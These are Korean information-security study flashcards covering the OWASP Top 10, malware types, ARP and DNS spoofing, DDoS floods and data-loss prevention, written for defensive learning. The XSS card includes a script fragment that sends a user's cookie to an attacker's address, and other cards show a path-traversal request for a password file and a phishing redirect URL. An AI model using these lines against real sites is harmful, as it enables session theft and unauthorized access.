How well did you know this?
1
Not at all
2
3
4
5
Perfectly
43
Q

전자봉투

A
▣ 개념
- 평문은 비밀키로 암호화 하고 그 비밀키를 공개키로 암호화 하여 첨부항 문서 형태
- 전자봉투를 보내는 사람은 받는 사람의 공개키를 가지고 있어야 함.
▣ 특징
- 전자봉투의 형태 (평문 P, 비밀키 K)
- E(P, K) | {K}B (비밀키 K는 1번만 사용됨)
- 전자봉투는 기밀성, 무결성, 부인방지를 모두 지원
▣ 처리과정
[A(송신자) Side]
1) 비밀키 임의 생성
2) 생성된 비밀키로 메시지 암호화. E(M)
3) B의 공개키로 비밀키 암호화. E(K)
4) E(M), E(K) 전자봉투 전송
[B(수신자) Side]
1) B의 개인키로 비밀키 복호화
2) 복호화된 비밀키로 메시지 복호화
※ E(M) : 대칭키 알고리즘
※ E(K) : 공개키 알고리즘
How well did you know this?
1
Not at all
2
3
4
5
Perfectly
44
Q

OWASP (The Open Web Application Security Project)

A
▣ 정의 : 웹 애플리케이션 취약점 중 공격 빈도가 높으며, 보안상 큰 영향을 줄 수 있는 10가지 취약점에 대한 대응 방안을 제공하는 웹 보안 기술 가이드
▣ 취약점 항목 (인세크 취보민기 크알검)
A1 - 인젝션
A2 - 인증 및 세션 관리 취약점
A3 - 크로스 사이트 스크립팅
A4 - 취약한 직접 객체 참조
A5 - 보안 설정 오류
A6 - 민감 데이터 노출
A7 - 기능 수준의 접근 통제 누락
A8 - 크로스 사이트 요청 변조
A9 - 알려진 취약점이 있는 컴포넌트 사용
A10 - 검증되지 않은 리다이렉트 및 포워드
How well did you know this?
1
Not at all
2
3
4
5
Perfectly
45
Q

A1 - 인젝션 (Injection)

A

▣ 위협요인
- 외부/내부 사용자, 관리자, 시스템에 신뢰할 수 없는 데이터를 보낼 수 있는 사람
▣ 공격경로
- 공격자는 목표로 한 인터프리터 (SQL, LDAP)의 구문을 악용할 수 있는 간단한 텍스트 기반의 공격코드를 보냄
▣ 보안 취약점
- SQL질의, LDAP질의, Xpath 질의, OS명령어, 프로그램 인수
▣ 기술적 영향
- 데이터 손실과 파괴, 책임 추적성 결여, 서비스 거부
▣ 비즈니스적 영향
- 데이터 조작, 삭제, 명성 훼손
▣ 방지책
- 동적SQL 대신 저장프로시저 사용
- 모든 입력 값 검증 (WhiteList, 특수문자 치환, 입력값 길이 제한)
- 웹서버 보안강화(자세한 오류 표시 차단, SQL 서버보안 강화)

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
46
Q

A2 - 인증 및 세션 관리 취약점 (Broken Authentication and Session Management)

A
▣ 위협요인
- 자신의 계정을 소유하고 있는 사용자
- 타인의 계정을 훔치려는 익명의 외부 공격자
- 자신의 행위를 숨기려고 하는 내부사용자
▣ 공격경로
- 공격자가 사용자를 위장하기 위해 인증이나 세션 정보 가로채기
▣ 보안 취약점
- 바르게 구축하지 않은 인증 및 세션 관리체계
- 로그아웃, 패스워드관리, 타임아웃, 사용자정보기억, 비밀번호 찾기 질문, 계정 업데이트 등의 보안 결함
▣ 기술적 영향
- 일부 혹은 모든 계정에 대한 공격을 허용.
- 성공하는 즉시 해당 계정이 할 수 있는 모든 것을 할 수 있기 때문에 특별한 권한이 부여된 계정은 빈번한 공격의 대상
▣ 비즈니스적 영향
- 영향을 받는 데이터나 어플리케이션 기능의 비즈니스적 가치를 고려
- 취약점의 공개적 노출에 대한 비즈니스 영향 고려
▣ 방지책
- 강력한 인증 및 세션 관리 통제의 단일 체계화
- 세션ID를 도용하는 데 사용될 수 있는 XSS 취약점 차단
How well did you know this?
1
Not at all
2
3
4
5
Perfectly
47
Q

A3 - 크로스 사이트 스크립팅 (XSS)

A

▣ 위협요인
- 외부/내부 사용자, 관리자를 포함하여 시스템에 신뢰할 수 없는 데이터를 보낼 수 있는 사람
▣ 공격경로
- 공격자는 정상 사용자가 접근하는 어플리케이션(게시판, Link, 이메일)에 공격용 스크립트 삽입
- 일반 사용자들이 해당 어플리케이션에 접근하면 공격스크립트 노출
- 공격자는 관련 스크립트로 사용자 주요 정보 및 2차 공격시도
(ex) = “ http://10.10.10.1/GetCookie.asp?cookie=” +document.cookie(사용자 쿠키를 Get하여 공격자에게 전송하는 스크립트)
▣ 보안 취약점
- 사용자가 전송하는 내용에 대해 웹 어플리케이션이 적절한 검증이나 제한을 하지 않음
- 결함형태 : Stored, Reflected, DOM
- 대부분의 결함은 테스트나 코드분석을 통해 쉽게 탐지 가능
▣ 기술적 영향
- 공격자는 사용자 세션 가로채기, 웹사이트변조, 악성 컨텐츠 삽입, 사용자 리 다이렉트, 악성코드를 사용해 사용자 브라우저 세션 가로채기 등을 사용해 브라우저에 스크립트를 실행
▣ 비즈니스적 영향
- 영향 받는 시스템과 시스템이 처리하는 모든 데이터의 비즈니스 가치 고려
- 취약점의 공개적 노출이 비즈니스에 미치는 영향 고려
▣ 방지책
- 사용자 주요 정보는 브라우저 쿠키에 저장하지 않도록 설정
- 스크립트코드의 특수문자 필터링 및 디코딩(“”)
- 게시판 등에서 꼭 필요한 경우에만 HTML 코드 사용하도록 함
- 스크립트 무효화(“JavaScript” -> “x-JavaScript”로 치환)

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
48
Q

A4 - 취약한 직접 객체 참조 (Insecure Direct Object References)

A
▣ 위협요인
- 유형별 시스템 데이터에 접근하는 사용자
▣ 공격경로
- 권한을 가진 시스템의 사용자인 공격자가, 한 시스템 객체로부터 권한을 갖지 않은 다른 객체로 직접 참조하기 위해 변수 값 변경
(ex) download.php?/var/etc/passwd(인증관련 파일에 대해 접근시도
▣ 보안 취약점
- 웹 페이지를 생성할 때 종종 실제 이름이나 키 값을 사용
- 사용자가 대상 객체에 대한 권한을 갖고 있는지 항상 검증하지 않음
- 안전하지 않은 직접 객체참조에 대한 결함에 노출
▣ 기술적 영향
- 변수 값을 참조하는 모든 데이터가 영향 받음
- 변수 명명에 규칙이 있는 경우, 공격자가 모든 가능한 데이터에 대해 쉽게 접근
▣ 비즈니스적 영향
- 노출되는 데이터의 비즈니스적 가치를 고려
- 취약점의 공개적 노출에 대한 비즈니스 영향 고려
▣ 방지책
- 사용자들이 접근하는 객체를 보호하는 접근 방식 보안 강화
- 사용자 혹은 세션당 간접 객체 참조를 사용
- 요청한 객체가 사용자에게 접근이 허용되었는지 확인
How well did you know this?
1
Not at all
2
3
4
5
Perfectly
49
Q

A5 - 보안 설정 오류 (Security Misconfiguration)

A

▣ 위협요인
- 자신의 계정을 소유한 정상적인 사용자
- 익명의 외부 공격자, 행동을 숨기고 싶어 하는 내부사용자
▣ 공격경로
- 공개 어플리케이션의 관리자 디폴트계정을 변경하지 않음
- 사용되지 않는 페이지, 패치 되지 않은 결함과 보호되지 않은 파일과 디렉토리
(ex) 이전 3com 스위치의 기본관리자 계정: manager/manager
▣ 보안 취약점
- 보안상 잘못된 구성을 플랫폼, 웹 서버, 어플리케이션 서버, 프레임워크, 커스텀 코드를 포함한 어떤 단계에서도 발생
- 개발자와 네트워크 관리자들이 전체 구조가 적절히 구성되었는지 확실히 하기 위한 협조 필요
- 자동화된 스캐너는 설치되지 않은 패치, 부적절한 구성, 디폴트계정의 사용, 불필요한 서비스 등을 탐지하는데 유용
▣ 기술적 영향
- 공격자가 시스템 데이터와 기능에 허용되지 않은 접근 가능
- 완벽한 시스템의 손상 가능
▣ 비즈니스적 영향
- 시스템이 알지 못하게 완전히 손상될 가능성.
- 모든 데이터가 도난 되거나 조작될 수 있음
- 높은 복구 비용 발생 가능성
▣ 방지책
- 반복 가능한 보안 강화프로세스, 개발, 품질보증, 생산 환경 모두에서 동일하게 구성 되어야 함
- 새로운 소프트웨어 업데이트와 패치를 각각의 배치 환경에서 시기 적절하게 배포와 최신 수준을 유지하기 위한 프로세스
- 구성요소들 사이에서 좋은 분리와 보안을 제공 하기 위한 강력한 어플리케이션 아키텍처
- 정기적 스캐닝과 감사의 수행

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
50
Q

A6 - 민감 데이터 노출 (Sensitive Data Exposure)

A
▣ 위협요인
- 인터넷상에서 사용자의 네트워크 트래픽을 모니터링 하는 사람
- 입력 데이터의 검증로직이 미흡한 경우
- 개인정보 입력을 유도하는 악의적인 사이트
▣ 공격경로
- 공격자는 피해자의 SSL 로그인 이후의 event를 네트워크 모니터링 하여 쿠키 및 인증 정보 가로채기
- SQL Injection
- 스푸핑
▣ 보안 취약점
- 인증하는 동안 SSL/TLS를 사용할지 모르지만, 가로챔으로 데이터나 세션ID 노출
- 만료되었거나 부적절하게 설정된 인증서들
- 사이트의 네트워크 트래픽을 관찰만으로 발견될 수 있는 결함
- 입력데이터의 검증로직 미흡
▣ 기술적 영향
- 개인사용자들이 데이터를 노출시키고 계정 탈취에 이용
- 관리자 계정이 탈취된 경우, 전체 사이트가 노출
- 피싱과 MITM 공격을 야기할 수 있는 취약한 SSL 설정
▣ 비즈니스적 영향
- 비밀성과 무결성, 상호 인증 요구 사항의 입장에서 통신 채널에서 노출된 데이터의 비즈니스 가치를 고려
▣ 방지책
- 모든 민감한 페이지는 SSL 처리 (해당 페이지에 대한 non-SSL 요청은 SSL 페이지로 리다이렉트)
- 모든 민감한 쿠키는 'secure' 플래그를 설정
- 인증서 유효 여부, 만기 여부, 폐기 여부 검증 강화
- 입력데이터의 SQL Injection 검증로직 처리
How well did you know this?
1
Not at all
2
3
4
5
Perfectly
51
Q

A7 - 기능 수준의 접근 통제 누락 (Missing Function Level Access Control)

A
▣ 위협요인
- 비 공개페이지에 접속 하거나 일반 사용자가 특권페이지에 접속
▣ 공격경로
- 주요 웹 페이지에 권한 인증 없이 URL을 통해 접속
▣ 보안 취약점
- 특정 권한 웹 페이지(URL)에 대한 쉬운 예측
▣ 기술적 영향
- 공격자가 허가되지 않은 기능에 접근 하도록 허용
- 관리적 기능들은 이러한 공격의 주된 목표임
▣ 비즈니스적 영향
- 노출된 기능과 그 기능이 처리하는 데이터의 비즈니스 가치를 고려
- 취약덤이 공개될 경우, 명성에 미칠 영향을 고려
▣ 방지책
- 각 페이지에 적절한 인증 및 접근 제어를 요구하는 접근 방식의 선택이 필요
- 인증 및 접근 제어 정책은 역할 기반 정책으로 관리 (정책 유지를 위한 노력을 최소화)
- 강제화 메커니즘은 기본적으로 모든 접근을 차단해야 함.
- 모든 페이지에 대해 접근을 위한 사용자와 역할을 구체적으로 명확히 부여하는 값이 요구됨
- 페이지가 워크플로우와 관련된 경우, 페이지에 대한 접근이 허가되는 적절한 상태에서 조건이 있는지 확인
How well did you know this?
1
Not at all
2
3
4
5
Perfectly
52
Q

A8 - 크로스 사이트 요청 변조 (CSRF)

A

▣ 위협요인
- 사용자의 접근이라고 속일 수 있는 요청을 보낼 수 있는 어떤 웹사이트나 HTML피드
▣ 공격경로
- 웹 서버 관리자 등 피해자가 웹 서버에 로그인 함
- 공격자는 변조된 HTTP 요청을 생성하여 게시판에 올림
- 피해자가 해당 게시판을 읽으면 피해자 세션으로 피해자가 원하지 않은 공격시도가 이루어짐
(ex) <img></img>
▣ 보안 취약점
- 브라우저는 세션 쿠키와 같은 자격 증명 정보들을 자동으로 전송하기 때문에 공격자는 정상적인 요청과 구별할 수 없는 변조된 요청을 포함한 악성 웹 페이지를 만듦.
- 일반적인 게시판에서 자바스크립트는 차단하나 이미지 GET 메소드는 허용
▣ 기술적 영향
- 공격자는 피해자의 권한이 허락하는 범위 내에서 어떤 데이터를 변화시키거나 특정 기능을 실행 하도록 함.
- 관리자 권한으로 우회 공격 하므로 공격자 IP 추적 불가
▣ 비즈니스적 영향
- 영향 받는 데이터나 어플리케이션 기능의 비즈니스 가치를 고려
- 명성에 영향을 줄 수 있는지 고려
▣ 방지책
- 사용자 세션 외에 추가적인 인증 절차 수립(토큰)
- 관리자 권한으로 게시판의 내용을 읽지 못하도록 방지

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
53
Q

A9 - 알려진 취약점이 있는 컴포넌트 사용 (Using Components with Known Vulnerabilities)

A

▣ 위협요인
- 잘 알려진 컴포넌트 또는 라이브러리의 취약점
▣ 공격경로
- 널리 알려진 Spring(expression language injection), Apache CXF(Authentication bypass), Struts2(Remote code execution) 등의 취약점을 이용하여 공격 대상 공격 권한 획득 또는 중요 정보 취득
▣ 보안 취약점
- Injection, 인증우회, 원격 코드 실행과 같은 취약점 노출 가능
▣ 기술적 영향
- Injection을 통한 중요 정보 유출 및 인증우회, 시스템 장악 가능
- 인증우회를 통한 관리자 권한 획득 가능
- 원격 코드 실행을 통한 중요 정보 획득 가능
▣ 비즈니스적 영향
- 사고 발생 시, 사업에 미칠 수 있는 영향도를 충분히 고려
▣ 방지책
- 취약점이 알려진 컴포넌트 또는 라이브러리, 어플리케이션에 대한 사용지양 또는 최신 업데이트 사용
- 취약점 존재 컴포넌트를 꼭 사용해야 하는 경우 알려진 문제에 대한 대비책 마련 필수
- 다중 보안 시스템의 적용으로 취약점 노출 시에도 취약점 고립화를 통한 2차 3차 피해 차단

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
54
Q

A10 - 검증되지 않은 리다이렉트 및 포워드 (Unvalidated Redirects and Forwards)

A

▣ 위협요인
- 웹사이트에 요청을 제출한 사용자를 속일 수 있는 사이트나 HTML 피드
▣ 공격경로
- 공격자는 승인되지 않은 리다이렉트로 연결하고 클릭을 하도록 피해자를 속임
- 피해자는 그 연결이 정상적인 값으로 간주하고 클릭
(ex) http://target/login.php?redirect=http://fishing/taget/php
▣ 보안 취약점
- 종졸 목적 페이지는 확인되지 않은 파라미터에 지정되어, 공격자가 목적지 페이지를 선택할 수 있음
- 확인되지 않은 리다이렉트의 탐지는 용이
▣ 기술적 영향
- 패스워드나 다른 민감한 정보 노출을 하도록 피해자를 속이거나 악성코드의 설치를 시도할 수 있음
▣ 비즈니스적 영향
- 사용자의 신뢰를 유지하는 비즈니스 가치 고려
- 악성 코드에 의한 탈취
- 공격자가 내부에서만 가능한 기능 접근 가능성
▣ 방지책
- 리다이렉트와 포워드 사용을 피함
- 목적 페이지 처리시 사용자 파라미터 포함을 피함
- 목적 파라미터를 사용할 경우, 제공된 값이 유효한지, 그 사용자에게 허용된 것인지 체크
- 실제 URL 또는 그 URL의 일부 보다는 맵핑된 값으로 목적 파라미터로 사용하고, 서버에서 그 맵핑 값을 목표 URL로 변환하도록 처리

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
55
Q

악성코드

A
▣ 개념 : 컴퓨터 사용자의 승인 없이 컴퓨터에 침투하거나 설치되어 악성행위를 수행하는 프로그램.
▣ 목적
- 접근권한 취득
- 금전적 이익 취득
- 고의적 파괴
- 리소스 강탈
▣ 유형
1) 시스템 행동형
- Virus : 숙주필요, 복제/변형/전이
- Worm : 독자실행, 복제
- Trojan Horse : 백도어설치, DDOS
- Key-logger
- Spy-ware
- Ad-ware
2) 시스템 제어용
- Bot : 컴퓨터 제어
- Root-kit : 관리자 권한 획득
- Backboor : 재침입/권한탈취
3) 통합형
- Flame : 행동형, 제어용 포함
▣ 악성코드 탐지 방법
1) Signature 기반탐지
- 알려진 악성코드 Signature DB 구성
- 알려진 악성코드 빠른 분석
- 오탐/미탐 최소화
- 신종/변종 악성코드, 패킹/난독화/압축 대응 불가
2) 행위 기반탐지
- 트리맵과 스레드 그래프 이용, 시각적 리포트 생성
- 신종/변종 코드 탐지
- 파일, 레지스트리 변경, 네트워크 트래픽 발생 경우
3) 유사도분석 기반탐지
- 제어 흐름 그래프 이용한 방법, 함수의 길이를 이용한 방법, 함수 호출 그래프를 이용한 방법, 바이트 레벨 파일 분석
▣ 악성코드 분석 방법
- 정적 분석 : Reverse Engineering
- 동적 분석 : Emulator, Virtual Machine
How well did you know this?
1
Not at all
2
3
4
5
Perfectly
56
Q

악성코드 분석 방법 (정적분석)

A
▣ 기법/도구
- Reverse Engineering
▣ 개념
- Dis-assembler, Decompiler 이용 역공학, 악성코드 바이너리 파일 실행시키지 않고 분석
▣ 장점
- 안전하며, 악성코드 구조와 동작 흐름 등 분석 가능
▣ 단점
- 자동화 어렵고, 노력/시간 많이 소모, 난독화 되었을 경우 분석 불가능
How well did you know this?
1
Not at all
2
3
4
5
Perfectly
57
Q

악성코드 분석 방법 (동적분석)

A
▣ 기법/도구
- Emulator, Virtual Machine
▣ 개념
- 악성코드 실행시켜 수행되는 내용 분석
▣ 장점
- 정확한 분석 가능, 감연 전 상태 복구 가능
▣ 단점
- 악성코드 실행 환경 구설 필요, 다양한 동작 흐름 중 일부만 분석 될 수 있음
How well did you know this?
1
Not at all
2
3
4
5
Perfectly
58
Q

변종 악성코드를 이용한 정보화의 역기능

A
▣ 랜섬웨어
- Ransom(몸값) + Ware(제품)
- 파일 암호화 후 금전 요구
▣ 피싱 (Phishing)
- Private(개인정보) + Fishing(낚시)
- 금융기관 가장 이메일 발송
- 가짜 은행 사이트 접속 유도
▣ 스미싱
- SMS + Phishing
- 무료 쿠폰, 돌잔치, 청첩장 문자
▣ 파밍
- 사용자 PC 조작
- 정상 사이트에 접속해도 가짜 사이로 유도
▣ 플로토스
- 미리 연결해둔 스마트폰에서 SMS 전송
▣ 메모리해킹
- 피해자 PC 메모리에 상주한 악성코드
How well did you know this?
1
Not at all
2
3
4
5
Perfectly
59
Q

좀비쿠키

A
▣ 정의
- 브라우저에 탑재되었거나 플러그인 형식으로 지원되는 로컬 스토리지를 이용하여 웹사이트 접속자의 개인정보와 접속기록을 수집, 일반 쿠키의 영역을 넘어서 개인의 프라이버시 침해 가능한 방법
▣ 저장소
- HTML5 : Session Storage, Local Storage, Global Storage, SQLLite
- Adobe Flash : Local Shared Object
- MS Silberlight : Isolated Storage
▣ 실행 매커니즘
1) 해커는 특정 서버를 해킹, 악성코드 플러그인 삽입
2) 사용자는 서버에 접속하여 관련 플러그인 프로그램 실행
3) 해당 플러그인에서 사용자의 로컬 스토리지상에 있는 개인정보 유출 및 온라인 이용 형태 수집
▣ 대응방안
- 쿠키 데이터 DES, 3DES, RC4 암호화
- 백신 설치, 전문 탐색 툴
How well did you know this?
1
Not at all
2
3
4
5
Perfectly
60
Q

스파이웨어

A
▣ 정의 : 스파이와 소프트웨어의 합성어, 다른 사람의 컴퓨터에 잠입하여 개인정보를 빼내는 악성 소프트웨어
▣ 특징
- 인터넷을 이용한 사용자 정보 유출
- 원하지 않는 사이트 강제 이동
▣ 동작원리
- 이벤트 감시
- 에이전트 가동
- 정보수집
- 통신
- 광고
▣ 예방
- 스파이웨어 프로그램 제거
- 레지스트리 제거
- 보안수준 상향 조정
How well did you know this?
1
Not at all
2
3
4
5
Perfectly
61
Q

좀비

A
▣ 정의 : 사용자의 시스템에 몰래 머무르다가 해커의 명령에 따라 움직이는 컴퓨터 또는 시스템
▣ 특징
- 바이러스를 다른 컴퓨터에 감염시킴
- 스펨메일의 발신원
- 부정침입 발판
- DDoS공격 근원
▣ 주요증상
- 사용자 모르게 백신 프로그램 제거
- 최근 지능화로 감지 어려움
▣ 감염경로
- 방화벽 미설치 PC
- 보안관리 소홀한 교육기관 네트워크
▣ 대응방안
- 엔드 포인트 보안
- 운영체제 보안패치
- 백신 프로그램 설치 및 업데이트
How well did you know this?
1
Not at all
2
3
4
5
Perfectly
62
Q

바이러스 (Virus)

A
▣ 정의 : 감염대상 프로그램에 자신의 코드 및 변형코드를 감염, 네트워크, 컴퓨터 시스템에서 확산하는 프로그램
▣ 동작원리
- 사용자 몰래 다른 프로그램이 감염되었는지를 확인한 후, 프로그램이 이미 감염되었으면 그대로 두고 그렇지 않으면 프로그램 내부에 자식을 복사
▣ 감염위치에 따른 분류
- 부트 바이러스
- 파일 바이러스 (.com, .exe)
- 부트/파일 바이러스
- 매크로 바이러스 : 문서감염
How well did you know this?
1
Not at all
2
3
4
5
Perfectly
63
Q

ARP Spoofing

A
▣ 정의 : LAN 카드의 고유한 주소인 MAC address를 동일 네트워크에 존재하는 다른 PC의 LAN 카드 주소로 위장, 다른 PC에 전달되어야 하는 정보를 가로채는 MITM 공격
▣ 유형
- 서버 존 : 모든 사용자 대상
- 클라이언트존 : 로컬 네트워크 대상
▣ 공격과정
- ARP Request Broadcasting dmv 이용하여 이더넷 상의 모든 호스트의 IP/MAC 주소 매핑 확인
- 각 호스트들에게 위조한 MAC 주소와 포트 매핑 정보 등록
- 공격자는 Cach가 사라지기 전에ARP Replay 지속적으로 전송
▣ 탐지방법
1) 피해 시스템
- ARP Table 조회 통한 MAC 주소 중복 확인
- 송신 패킷에서 악성코드 유무 검사
- 비정상적 ARP 패킷 수진 확인
- ARP Table 감시 활용
2) 공격 시스템
- ARP Spoofing 실행 프로그램 확인
- 네트워크 어댑터의 동작상태 확인
- ARP 패킷 관찰
▣ 방지 대책
-  사용자 단말 : 백신 사용
- 시스템 : 정적 ARP TAble 관리, 보안 수준 강화, 중요 패킷 암호화
- 네트워크 장비 : Switch Port Security, 사설 VLAN 기능 활용, L2 보안 스위치 사용
How well did you know this?
1
Not at all
2
3
4
5
Perfectly
64
Q

DNS Cache Poisoning Attack

A
▣ 개념
- 취약한 DNS서버에 조작된 query를 전송하여 DNS 서버가 저장하고 있는 주소 Cache 정보를 임의로 변조하는 공격
▣ DNS Protocol의 보안 취약점
- Denial of Service
- DNS 프로그램 중지
- DNS Spoofing
- Pharming
- DNS Cache Poisoning
▣ 동작원리
1. 공격자는 네임서버를 가지고 있으며 공격자의 도메인을 cache 서버에 질의 (ex. www.example.com)
2. Cache 서버는 example.com에 대한 정보가 없으며 해당 도메인의 ns 서버에 쿼리를 던짐 (이 도메인의 NS서버는 공격자에 속함)
3. 공격자 네임서버는 example.com의 IP가 200.1.1.10이라는 응답과 additional resolution 레코드를 포함하여 응답을 줌. 이때 정상적인 네임서버의 응답을 방해하기 위해 DoS 공격을 정상 네임서버에게 시도
4. 캐시서버는 공격자의 네임서버에서 준 잘못된 정보를 H시간 동안 캐시
5. 사용자는 www.mybank.com에 대해 쿼리 캐시 서버는 정상적인 IP대신에 변조된 200.1.1.11을 응답하고 사용자는 잘못된 IP로 접속
▣ 문제점
- 개인정보 가로채기
- Malware 유포
- 거짓정보 유포
- 정자상거래 사이트 위장
▣ 대응방안
- DNS 최신 버전 유지
- DNS의 Recursion 기능 중지
- 안전한 DNS 사용을 위한 보안 정책 적용
- DNS 버전 숨김
- DNS BIND Disable
How well did you know this?
1
Not at all
2
3
4
5
Perfectly
65
Q

DNSSEC

A

▣ 개념 : 도메인과 IP주소에 대한 공개키 암호화 방식 전자서명 검증 절차를 수행하여 위/변조 대응 가능한 기술
▣ 동작원리
1) A는 개인키 및 공개키로 구성된 서명용 키를 생성
2) A의 공개키는 인터넷 일반에 공개하여 배포
3) A는 B에게 송부할 원본데이터에 대해 서명처리하여 서명(signature) 데이터를 산출
4) A는 “원본데이터”에 “서명” 데이터를 부가하여 인터넷 경유하여 B에게 전송
5) B는 A로부터 “원본데이터”와 “서명” 데이터를 수신
6) B는 A의 공개키를 조회하여 파악
7) B는 A의 공개키를 사용, “원본데이터”, “서명” 대상의 서명검증 수행
8) 서명검증이 정상이면, B가 A로부터 수신한 “원본데이터”에 중간에 위-변조되지 않았음 을 확신
▣ 관리정보
- DNSKEY : 공개키 데이터 저장
- RRSIG : 개인 키의 전자서명 결과값
- DS : 인증된 위임체계 구성 데이터
- NSEC/NSEC3 : DNS데이터 부재 인증 정의

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
66
Q

DDOS (Distributed Denial of Service)

A
▣ 정의 : DoS공격용 프로그램들이 분산 설치 되어 이들이 서로 통합된 형태로 목표 시스템에 대하여 일제히 데이터 패킷을 범람시켜 그 표적 시스템의 성능저하 및 시스템 마비를 일으키는 기법
▣ 특징
- 대량의 좀비 PC
- Agent  설치
- 명령제어서버(C&amp;C)
▣ 공격유형
1) Flooding 공격(패킷 무작위 전송)
- non-Spoofing 공격 : SYN, ACK, FIN, RST, UDP/TCP, ICMP flooding, 혼합 flooding 공격
- Spoofing 공격 : SYN, ACK, FIN, RST, UDP/TCP, ICMP flooding, 혼합 flooding 공격
2) 커넥션 기반 공격 (HTTP 커넥션 용량 초과)
- HTTP공격
- TCP Connection 공격 : input Queue 마비
- Application 특성 공격 : FTP, Time, VoIP, Email, DNS, DHCP, SQL, Netbios, RPC, Cache Control
▣ 공격탐지
- IDS/IPS : signature 탐지
-  DDoS대응 시스템 : L3기반 탐지 우회
- Netflow : 트래픽 패턴 분석
- ACL : Access-list 이용
- MRTG or RRD : MIB데이터 분석
- DNS서버 : DNS query분석
- L7 스위치 : query 임계치 경고
▣ 차단대책
- URL 차단 : DNS싱크홀, L7
- IP차단 : Blackholing, ACL, uRPF, CAR(Rate-limit), PBR
- PORT, Protocol 차단 : L7, ACL
▣ 중장기 대응 전략
- 디도스 예방 인프라 구축
- 전문인력 양성과 보강
- 관계기관 정보보호 협력체계 구축
- 사이버 정보보호 인식 강화
How well did you know this?
1
Not at all
2
3
4
5
Perfectly
67
Q

DDOS 공격 유형

A
▣ Bandwidth 공격
- UDP Flooding
- ICMP Flooding
- TCP SYN Flooding
▣ Application 공격
- HTTP GET Flooding
- HTTP CC Attack
- DNS Recode
- SIP Method Flooding
▣ Transport (과거공격)
- 탐지용이
- IPS/Anti-DDos/QoS/Router 장비로 문제 완화
▣ Application (최신공격)
- 탐지 어려움
- L4 튜닝/웹서버 튜닝/L7 튜닝/Anti-DDos 튜닝/웹 방화벽 튜닝/코드 수정으로 문제완화
How well did you know this?
1
Not at all
2
3
4
5
Perfectly
68
Q

SYN Flooding

A

▣ 개념
- TCP가 데이터를 보내기 전에 연결을 맺어야 하는 연결지향 특성을 이용한 공격방법
- TPC의 3 Way Handshaking 의 SYN패킷의 특성 이용
▣ 절차
- 공격자는 Unreachable한 호스트인 IP 주소로 Spoofing 하여 계속하여 연결요청(SYN/ACK)패킷을 보냄
- Victim은 Unreachable호스트에게 ACK를 받을 때까지 이러한 연결 상태를 계속 큐에 저장
- 시간이 지나면 큐는 Overflow가 발생되고
- 이후에 큐로 들어오는 연결요청은 거부하게 됨

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
69
Q

UDP Flooding

A

▣ 개념
- UDP의 비연결성 및 비신뢰성 때문에 공격이 용이한 방법
- 대표적으로 TFTP, SNMP, 실시간 인터넷 발송이 해당
▣ 절차
- 공격자가 Victim A에게 Source IP Address를 Victim B의 IP Address로 Spoofing 하여 대량의 UDP패킷을 전송
- Victim A, Victim B는 계속해서 서로 패킷을 주고 받게 되어 두 시스템 사이의 네트워크에 과부하가 초래됨

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
70
Q

ICMP Flooding

A

▣ 개념
- 활성화된 서비스나 포트가 필요하지 않는 프로토콜의 특성을 이용하여 공격
- 공격방법으로 Smurf, Welchia worm등이 있음
▣ 절차
- Smurf는 공격자가 Source IP Address를 Victim의 IP Address로 설정한 후
- Broadcast Address로 ICMP echo request 패킷을 전송하면
- 그 하위 모든 시스템들이 ICMP echo replay 패킷을 Victim으로 전송하게 되어 대량의 패킷들이 집중하여 네트워크 부하를 높이게 됨

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
71
Q

DLP (Data Loss Prevention)

A
▣ 정의
- 기업 내부의 민감한 데이터, 지적재산/사업 정보 및 고객개인정보 등의 데이터 유출을 사전에 방지하기 위한 데이터 유출 방지 솔루션
▣ 필요성
- 유출사고 예방
- 유출사고 실시간 차단
- 감사 및 모니터링
▣ 주요기능
- 접근제어 : 시스템적, 물리적
- 암호화
- 필터링 : 트래픽 제어
- 엔드포인트 탐색/차단 : 다운로드, USB/CD/DVD/Firewire/SCSI 쓰기 차단 및 위반행위 알림
- 네트워크 탐색 및 차단 : 트래픽 모니터링, 외부전송 차단, 격리, 암호화
- 광범위한 데이터 탐색/차단 : 파일서버, DB서버, 협업시스템, 웹서버 스캔
▣ 구성요소
1) DLP 관리자
- 정책 관리
- 시스템 관리
- 상황 워크플로
- 보고 및 대시보드
2) DLP 데이터 센터
- 민감데이터 탐색
- 민감데이터 통제
3) DLP 네트워크
- 모니터링
- 데이터 전송 통제
4) DLP 엔드포인트
- 사용자 활동 감시
- 데이터 암호화
▣ 기술요소
1) 접근제어 : RBAC, XSCML
2) 암호화 : 3DES, AES, RSA
3) 필터링 : 트래픽/컨텐츠 제어
4) 활동감시 : 사전/사후 관리
▣ 유형
- 엔드포인트 기반 DLP
- 네트워크 기반 DLP
- 데이터센터 기반 DLP
How well did you know this?
1
Not at all
2
3
4
5
Perfectly
72
Q

엔드포인트 기반 DLP

A
▣ 개념
- 사용자의 각 단말에 DLP 솔루션을 적용하여 핵심 데이터 유출을 사전 차단
▣ 장점
- 오프라인 상태에서 데이터 보호 가능
- 데이터 암호화 되기 전 데이터 식별 가능
- 비용 대비 높은 효과 기대 가능
▣ 단점
- 단말 마다 설치 요구
- 다양한 환경과 안전성 확보 곤란
- 악성코드 감염 가능성 존재
- 설치 불가능한 단말이 존재
How well did you know this?
1
Not at all
2
3
4
5
Perfectly
73
Q

네트워크 기반 DLP

A
▣ 개념
- 사내 네트워크 시스템에 DLP 솔루션을 탑재, 패킷 필터링 기능을 통한 제어
▣ 장점
- 구성이 단순하여 환경에 미치는 영향 최소화 가능
- 상대적으로 적은 비용으로 설치
- 단말 종류와 관계 없이 데이터 보호 가능
▣ 단점
- 오프라인 상태에서 데이터 보호 불가능
- 암호화 통신시 허점 발생, 컨텐츠 분석에 어려움 존재
How well did you know this?
1
Not at all
2
3
4
5
Perfectly
74
Q

데이터센터 기반 DLP

A
▣ 개념
- 서버 시스템의 스토리지에 DLP를 적용하여 데이터 단위 유출 통제
▣ 장점
- 정보 사고 유출 가능성 최소화 가능
- 단말 종류와 관계 없이 데이터 보호 가능
▣ 단점
- 비정형화된 접근과 통신방식으로 인해 유출 통제 곤란
How well did you know this?
1
Not at all
2
3
4
